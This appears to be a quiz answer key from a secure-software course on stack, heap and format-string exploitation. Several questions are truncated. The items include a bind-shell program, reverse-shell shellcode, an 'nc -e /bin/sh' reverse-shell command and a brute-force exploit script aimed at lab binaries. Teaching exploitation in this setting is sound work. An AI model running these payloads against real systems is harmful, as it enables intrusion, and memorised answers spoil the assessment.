Secure Software Process - Part 2
As for format string attacks, which of the followings is/are True?
%s looks at the parameter memory content and prints out the content pointed by that memory content
In pwntools command utilities, the command to generate assembly hexadecimal of nop instruction on arm architecture is: asm _______ arm nop
-c
The command echo _______ > /proc/sys/kernel/randomize_va_space disables ASLR. (Please fill in one-digit-decimal number)
0
To set current current program execute with privilege of the root user. We need to call setuid system call with _________ (Please fill in one-digit decimal integer)
0
We can bypass canary via information leakage with a format string vulnerability. If the current canary value before our attack is 0x23098302, then in our exploit, the value we should put for canary is ________ (Please fill in the blank with a hexadecimal number starting with 0x and then 8-hexadecimal-digit.)
0x23098302
What is the first byte of our shellcode on this x86 machine?
0x6a
In our lecture, we have the following assembly code snippet for main function: 08049298 <main>: ... 8049448: 83 ec 0c sub $0xc,%esp 804944b: ff 75 ec push -0x14(%ebp) 804944e: e8 e3 fd ff ff call 8049236 <client_handle> 8049453: 83 c4 10 add $0x10,%esp 8049456: eb 98 jmp 80493f0 <main+0x158> After calling function client_handle, the fall-through address is _____. (Please fill in the blank with an address starting with 0x and then 7 digits)
0x8049453
In our lecture code, we use the following shellcode to reveal canary by exploiting a format string vulnearbility: shellcode = "AAAA.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x" Say, for a particular run, the output is: $ python3 reveal_canary.pyb'AAAA.400.f7fe67d3.0.804d5b0.1ab.41414141.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252
0x9b179100
In a 32-bit system, if the return address we would like to overwrite with our first libc function address is 0xffffd13c, the address on the stack containing the return address of that first libc function is _______(Please fill in the blank with a hexadecimal number starting with 0x and then 8-hexadecimal-digit.)
0xffffd140
In a 32-bit system, if the return address we would like to overwrite with our first libc function address is 0xffffd13c, the address on the stack containing the first parameter of that first libc function is ________(Please fill in the blank with a hexadecimal number starting with 0x and then 8-hexadecimal-digit.)
0xffffd144
In a 32-bit system, if the return address we would like to overwrite with our first libc function address is 0xffffd13c, the address on the stack containing the second parameter of that first libc function is _______(Please fill in the blank with a hexadecimal number starting with 0x and then 8-hexadecimal-digit.)
0xffffd148
Let's consider the following code: stack_overflow.c #include <stdio.h> #include <stdlib.h> #include <string.h> void check_secret(char *argv1) { int secret = 0xdeadcafe; char user_input[ 0x30]; strcpy(user_input, argv1); if (secret == 0xdeadbeef) { puts("Congratulations! You find the flag"); exit(0); } else { puts("Please try again!"); }} int main(int argc, char **argv) { if (argc != 2) { printf("stack_overflow <secret>\n"); return 1; } check_secret(argv[ 1]); return 0;} We first try AAAA as the input. By using pwndbg tool, we have the following memory layout: pwndbg> x/12xw &user_input 0xffffd17c: 0x41414141 0x00000000 0x00000000 0x01000000 0xffffd18c: 0x0000000b 0xf7fc4540 0x00000000 0xf7c184be 0xffffd19c: 0x0000000b 0xf7fc4540 0x00000000 0xf7c184be 0xffffd1ac: 0xdeadcafe 0xf7fbe4a0 0xf7fd6f80 0xffffd1c8 Suppose currently user_input have the value string of AAAA and secret has the value of 0xdeadcafe. Fill in the following blanks: The variable user_input stack address is . (Please fill in an address starting with 0x and followed by 8 hexadecimal digits) The variable secret stack address is . (Please fill in an address starting with 0x and followed by 8 hexadecimal digits) We c
0xffffd17c 0xffffd1ac 48
Suppose we have the current global variable layout for a binary: pwndbg> x/128x &buffer_data 0x804c040 <buffer_data>: 0x00000001 0x00000000 0x00000000 0x00000000 0x804c050 <buffer_data+16>: 0x00000000 0x00000000 0x00000000 0x00000000 0x804c060 <buffer_data+32>: 0x00000000 0x00000000 0x00000000 0x00000000 0x804c070 <buffer_data+48>: 0x00000000 0x00000000 0x00000000 0x00000000 0x804c080 <buffer_data+64>: 0x00000000 0x00000000 0x00000000 0x00000000 0x804c090 <buffer_data+80>: 0x00000000 0x00000000 0x00000000 0x00000000 0x804c0a0 <buffer_data+96>: 0x00000000 0x00000000 0x00000000 0x00000000 0x804c0b0 <buffer_data+112>: 0x00000000 0x00000000 0x00000000 0x00000000 0x804c0c0 <secret>: 0xdeadcafe 0x00000000 0x00000000 0x00000000 0x804c0d0: 0x00000000 0x00000000 0x00000000 0x00000000 0x804c0e0 <completed.0>: 0x00000000 0x00000000 0x00000000 0x00000000 0x804c0f0: 0x00000000 0x00000000 0x00000000 0x00000000 0x804c100 <buffer_bss>: 0x00000000 0x00000000 0x00000000 0x00000000 0x804c110 <buffer_bss+16>: 0x00000000 0x00000000 0x00000000 0x00000000 0x804c120 <buffer_bss+32>: 0x00000000 0x00000000 0x00000000 0x00000000 0x804c130 <buffer_bss+48>: 0x00000000 0x00000000 0x00000000 0x00000000 We can overflow
128
In our lecture, we have the following code: #include <stdio.h> #include <strings.h> #include <sys/socket.h> #include <netinet/in.h> int main(void) { int sockfd, connfd; struct sockaddr_in serv_addr, cli_addr; socklen_t sin_size; sockfd = socket(AF_INET, SOCK_STREAM, 0); bzero(&serv_addr, sizeof(serv_addr)); serv_addr.sin_family = AF_INET; serv_addr.sin_addr.s_addr = INADDR_ANY; serv_addr.sin_port = htons(33333); bind(sockfd, (struct sockaddr *)&serv_addr, sizeof(serv_addr)); listen(sockfd, 1); sin_size = sizeof(cli_addr); connfd = accept(sockfd, (struct sockaddr *)&cli_addr, &sin_size); dup2(connfd, 0); dup2(connfd, 1); dup2(connfd, 2); char *argv[] = {"/bin/sh", NULL}; execve(argv[0], argv, NULL); } The script listens to the port _________ on the local machine. (Please fill in with a 5-digit decimal integer)
33333
In our lecture, we have the following code: fmt_vuln.c #include <stdio.h> #include <stdlib.h> #include <string.h> int main(int argc, char *argv[]) { char text[ 1024]; static int targeted_val = 0x5a5a5a5a; if(argc < 2) { printf("Usage: %s <text to print>\n", argv[ 0]);exit(0); } strcpy(text, argv[ 1]);printf(text);printf("\n"); printf("[ *] targeted_val @ 0x%08x = %d 0x%08x\n", \ &targeted_val, targeted_val, targeted_val); exit(0); } Suppose we have the following output for a command: $ ./fmt_vuln AAAA%08x.%08x.%08x.%08x.%08x.%08x.%08x AAAAff99d2b5.f7c05634.ff99b94c.ff99d2b5.41414141.f7c05634.ff99b94c [ *] targeted_val @ 0x0804c028 = 1515870810 0x5a5a5a5a Fill in the following blank with one digit of decimal integer number: $ ./fmt_vuln AAAA% _________ \$xAAAA41414141 [ *] targeted_val @ 0x0804c028 = 1515870810 0x5a5a5a5a
5
Select all is/are correct:
Bind shell binds to a particular port Some shellcode can download and execute another shellcode Remote shellcode can remotely access a machine through internet connections
ASCII armoring obstructs ret2libc by requiring every libc function binary code to have a 0x00 byte.
False
As for canary protection: The control data on the stack is between the buffer and the canary.
False
Binaries compiled with "-z execstack" will have none-executable stacks.
False
Command cat /proc/self/maps | egrep '(stack|heap)' shows the stack and heap memory address range in other processes.
False
Command pgrep vaddr searches for processes with vaddr and returns the name of the executable.
False
If we overwrite the return address with an address of a JMP ESP instruction, that is, we perform a JMP ESP based stack smashing, the shellcode should have a lower address than the address storing return address.
False
In the lecture, we use the following script for ret2plt: script too long to input CHAPTER 13 The exploit will print out the string "/etc/passwd" to the terminal.
False
In the lecture, we use the following script for ret2plt: script too long to input CHAPTER 13 At the end of final_shellcode, there are four PADDING4 paddings. If we only shorten these four paddings to three paddings, and left other strings unchanged, the exploit still works.
False
In the lecture, we use the following script for ret2plt: script too long to input CHAPTER 13 The beginning 0x90 padding of the payload is 512 bytes.
False
Kernel space is in lower address of the whole process address space in x86 32 bit system.
False
NX/DEP implementation does not need kernel support.
False
The frame of function client_handle includes memory between buffer start address and the address for saved ebp, exclusively.
False
The mprotect function can be called with three parameters. And the first parameters is the memory range size, the second parameter is the memory start address, and the third parameter is the privilege.
False
The privilege parameter of mprotect, if given 6, means executable privilege.
False
The shadowed memory in the figure contains 528 bytes.
False
Victim, not the attacker, should listen to some of its own ports to establish a reverse shell.
False
We can redirect the program to any address with 0x90 (NOP) instructions after our shellcode to execute our shellcode immediately.
False
mmap system call maps memory into files or devices.
False
ret2libc technique returns to kernel functions.
False
In our lecture, we have the following code: #include <stdio.h> #include <strings.h> #include <sys/socket.h> #include <netinet/in.h> int main(void) { int sockfd, connfd; struct sockaddr_in serv_addr, cli_addr; socklen_t sin_size; sockfd = socket(AF_INET, SOCK_STREAM, 0); bzero(&serv_addr, sizeof(serv_addr)); serv_addr.sin_family = AF_INET; serv_addr.sin_addr.s_addr = INADDR_ANY; serv_addr.sin_port = htons(33333); bind(sockfd, (struct sockaddr *)&serv_addr, sizeof(serv_addr)); listen(sockfd, 1); sin_size = sizeof(cli_addr); connfd = accept(sockfd, (struct sockaddr *)&cli_addr, &sin_size); dup2(connfd, 0); dup2(connfd, 1); dup2(connfd, 2); char *argv[] = {"/bin/sh", NULL}; execve(argv[0], argv, NULL); } Which of the followings is/are correct?
It is permitted to set the third parameter of execve to be NULL The shellcode listens to some port on the machine The shellcode starts a /bin/sh shell
We have the following two running processes virtual memory maps: Process 101201: fffdd000-ffffe000 rwxp 00000000 00:00 0 [stack] Process 122321: fffdd000-ffffe000 rw-p 00000000 00:00 0 [stack] Which of the followings is/are true?
Process 122321 has NX/DEP protection
In our lecture, we have the following code: /* Reverse TCP shell (72 bytes) Connects to 192.168.1.133:33333 by default. */ #include <stdio.h> #include <string.h> int main(void) { unsigned char code[] = \ "\x6a\x66\x58\x99\x52\x42\x52\x89\xd3\x42\x52\x89\xe1\xcd\x80\x93\x89\xd1\xb0" "\x3f\xcd\x80\x49\x79\xf9\xb0\x66\x87\xda\x68" //"\xc0\xa8\x01\x85" // <-- ip address "\x7f\x00\x00\x01" // <-- ip address "\x66\x68" "\x82\x35" // <--- tcp port "\x66\x53\x43\x89\xe1\x6a\x10\x51\x52\x89\xe1\xcd\x80\x6a\x0b\x58\x99\x89\xd1" "\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80";int (*ret)() = (int(*)())code; ret(); } Which of the followings is/are correct?
The shellcode is on the stack The port is represented in this shellcode as bytes "\x82\x35" and it is 33333 The remote ip address in this shellcode is represented as bytes "\x7f\x00\x00\x01" The remote ip address is 127.0.0.1
In pwndbg environment for a 32-bit binary, the program counter is currently before the following instruction: call 8049050 which of the followings is/are True?
This call instruction will jump to the callee function and save return address
Command pgrep vaddr can return more than one process as the result.
True
In order to connect to the reverse shell, the attacker server should listen to port 8080 beforehand.
True
In our lecture, as shown in the figure, the return address is overwritten with the start address of the buffer.
True
In our lecture, we use the following shellcode snippet: CMD = " " \ ""\ ""\ ""\ ""\ ""\ ""\ ""\ "nc.traditional -e /bin/sh localhost 8080" "SHELL CODE" assembly (too long not going to input)
True
In our lecture, we use the following shellcode snippet: CMD = " " \ ""\ ""\ ""\ ""\ ""\ ""\ ""\ "nc.traditional -e /bin/sh localhost 8080" The number of white space " " before the nc.traditional command is not important and can be shortened than the current one, with shellcode jumping to a lower address.
True
In the lecture, we exploit the following program with call eax technique: vuln2.c #include <stdio.h> #include <string.h> void func(char *name) { char buf[100]; strcpy(buf, name); } int main(int argc, char *argv[]) { func(argv[1]); return 0; } Is the following True or False? We can use call eax technique in this exploit because eax contains the return value of strcpy, which is the address of buf. And in between the return of strcpy and the ret instruction, there is no instruction that change the value of eax.
True
In the lecture, we use the following script for ret2plt: script too long to input CHAPTER 13 In this exploit, the effect of esp lifting 4 bytes gadget: pop ebx ; ret is just to skip over 4-bytes padding on the stack.
True
In the lecture, we use the following script for ret2plt: script too long to input CHAPTER 13 The effect of gadget: push esp ; pop edx ; ret is to copy the value of esp to register edx.
True
In the lecture, we use the following script for ret2plt: script too long to input CHAPTER 13 The purpose of gadget: mov dword ptr [ebx], edx ; ret is to copy the stack address of string "/etc/passwd" to the first parameter of open library function.
True
In the lecture, we use the following script for ret2plt: script too long to input CHAPTER 13 sendfile function in this exploit takes 4 as first parameter and 5 as second parameter and sends the file content from file descriptor 4 to file descriptor 5, which is, from the last file opened "\etc\passwd" to network socket.
True
Linux systems have a system call named setuid.
True
Morris Worms exploits stack overflow as early as in 1980s.
True
ROPgadget command can be used to search for rop gadgets in binary.
True
StackShield protection creates a separate stack to store a copy of the function's return address.
True
The gadget pop eax; pop ebx; ret; can be used to lift ESP for 8 bytes.
True
The memory for heap in the process address space may change each run when ASLR is enabled.
True
Today's canary is stored in gs segment.
True
We can bypass canary protection via __stack_chk_fail hijacking. Specifically, for instance, we can overwrite the GOT entry for __stack_chk_fail.
True
We can redirect the program to any address with 0x90 (NOP) instructions before our shellcode to execute our shellcode immediately.
True
mmap2 system call maps files or devices into memory.
True
rop command in pwndbg can be used to search for rop gadgets in binary.
True
rop gadget 1: add esp 8; pop ebx; ret rop gadget 2: pop edx; pop esi; pop ebx; ret are equivalent in the sense of lifting esp. (32-bit x86 system)
True
In the lecture, we have a vulnerable c program and a bash script to exploit it. vuln.c #include <stdio.h> #include <string.h> void func(char *name) {char buf[100]; strcpy(buf, name); printf("buf addr: %p\n", buf); } int main(int argc, char *argv[]) { func(argv[1]); return 0; } bruteforce.sh #!/bin/sh export SHELLCODE=$(perl -e 'print "\x90"x100000 . "\x31\xdb\x6a\x17\x58\xcd\x80\x68\x01\x01\x01\x01\x81\x34\x24\x2e\x72\x69\x01\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\x6a\x0b\x58\xcd\x80"') i=1 while : do echo "${i}-th execution" ./vuln $(perl -e 'print "A"x112 . "\x60\xb0\xb9\xff" . $SHELLCODE') if [ $? -eq 0 ] then exit fi i=$(( $i + 1 )) done Which of the followings is/are correct?
When the right input is generated, the SHELLCODE string is executed. Each loop interation, the input parameter to program is a string generated by perl. The bash script guesses the right return address using brute-force.
We have two binaries compiled using different GCC compiler optimization flags. The source code: #include <stdio.h> void f (){char a[30]; int b;double c; char d[20]; char *p; char e[10]; char *q; printf ("%p=a\n%p=b\n%p=c\n%p=d\n%p=e\n%p=p\n%p=q\n\n",&a, &b, &c, &d, &e, &p, &q); } void main () { f(); } The result of running two binaries: binary_1 and binary_2: $ ./binary_1 | sort 0xffffd118=q 0xffffd11e=e 0xffffd128=p 0xffffd12c=d 0xffffd140=c 0xffffd14c=b 0xffffd152=a $ ./binary_2 | sort 0xffffd13c=b 0xffffd140=p 0xffffd144=q 0xffffd148=c 0xffffd150=e 0xffffd15a=d 0xffffd16e=a Which of the followings is/are true?
binary_2 has canary protection
In our lecture, we have the following code: #include <stdio.h> #include <strings.h> #include <sys/socket.h> #include <netinet/in.h> int main(void) { int sockfd, connfd; struct sockaddr_in serv_addr, cli_addr; socklen_t sin_size; sockfd = socket(AF_INET, SOCK_STREAM, 0); bzero(&serv_addr, sizeof(serv_addr)); serv_addr.sin_family = AF_INET; serv_addr.sin_addr.s_addr = INADDR_ANY; serv_addr.sin_port = htons(33333); bind(sockfd, (struct sockaddr *)&serv_addr, sizeof(serv_addr)); listen(sockfd, 1); sin_size = sizeof(cli_addr); connfd = accept(sockfd, (struct sockaddr *)&cli_addr, &sin_size); dup2(connfd, 0); dup2(connfd, 1); dup2(connfd, 2); char *argv[] = {"/bin/sh", NULL}; execve(argv[0], argv, NULL); } In the program, ________ function allocates a new file descriptor that refers to the network socket. The standard output file descriptor number is _______. (Please fill in the first blank with a function name of four characters long and fill in the second blank with a one-digit decimal integer)
dup2 1
In pwndbg environment for a 32-bit binary, the program counter is currently before the following instruction: call 8049050 which of the followings is/are True?
ni command in gdb will step to next instruction in the same function si command in gdb will step to next instruction in the callee function
In pwndbg environment for a 32-bit binary, which of the followings is/are True?
p targeted_data will print out the value of variable targeted_data p &targeted_data will print out the address of variable targeted_data
In our lecture, we have the following code: global _start section .text _start: jmp short call_shellcode shellcode: pop ebx mov ecx,0 mov edx,0 mov al, 11 int 0x80 call_shellcode: call shellcode message db "/bin/sh" Which of the following is/are correct?
pop ebx instruction will pop the address of string "/bin/sh" call shellcode instruction will push the address of the string "/bin/sh" on the stack
Which of the following is/are memory corruption vulnerabilities?
use-after-free double-free integer overflow
In our lecture, we have the following code: heap_overflow.c #include <stdio.h> #include <stdlib.h> #include <string.h> void check_secret(char *argv1) { char *buffer1 = malloc(8); int *buffer2 = malloc(4); int secret = 0xdeadcafe;memcpy(buffer2,&secret,4); strcpy(buffer1, argv1); if ((*buffer2) == 0xdeadbeef) { puts("Congratulations! You find the flag"); exit(0); } free(buffer1); free(buffer2); } int main(int argc, char **argv) { if (argc != 2) { printf("stack_overflow <secret>\n"); return 1; } check_secret(argv[1]); printf("Please try again\n"); return 0; } Suppose user_input is allocated at 0x804d1b0 and secret is allocated at 0x804d1a0. Which of the followings is/are True?
user_input cannot overflow secret with 20 words of data
In pwndbg environment for a 32-bit binary, which of the followings is/are True?
x/100x 0x80804840 will output 100 words of memory starting from 0x80804840 if previous command is x/100xw 0x80804840 x/100xw 0x80804840 will output 100 words of memory starting from 0x80804840 x/100xb 0x80804840 will output 100 bytes of memory starting from 0x80804840